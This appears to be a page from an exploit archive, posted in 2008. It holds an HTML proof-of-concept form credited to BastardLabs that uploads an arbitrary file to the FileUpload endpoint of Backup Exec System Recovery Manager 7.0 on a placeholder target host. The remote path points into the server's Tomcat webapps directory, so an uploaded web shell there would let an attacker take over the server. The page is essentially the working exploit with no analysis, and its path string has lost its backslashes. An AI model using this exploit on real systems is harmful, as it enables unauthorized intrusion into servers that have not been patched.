Home / os / win10

backupexec-upload.txt

Posted on 08 February 2008

<?xml version="1.0"?> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title>File Upload POC</title></head> <body> <h2> Backup Exec System Recovery Manager 7.0<br>File Upload POC</h2> <form action="https://<TARGET>:8443/axis/FileUpload" method="post" enctype="multipart/form-data"> Remote Path: <input name="path" size="100" type="text" value="C:Program FilesSymantecBackup Exec System RecoveryManagerServices omcatWebAppsaxis"/><br/> File to upload: <input name="log_file" type="file"/><br/> <hr/> <p><input type="submit"/><input type="reset"/></p> </form> (c)BastardLabs 2008. </body> </html>

 

TOP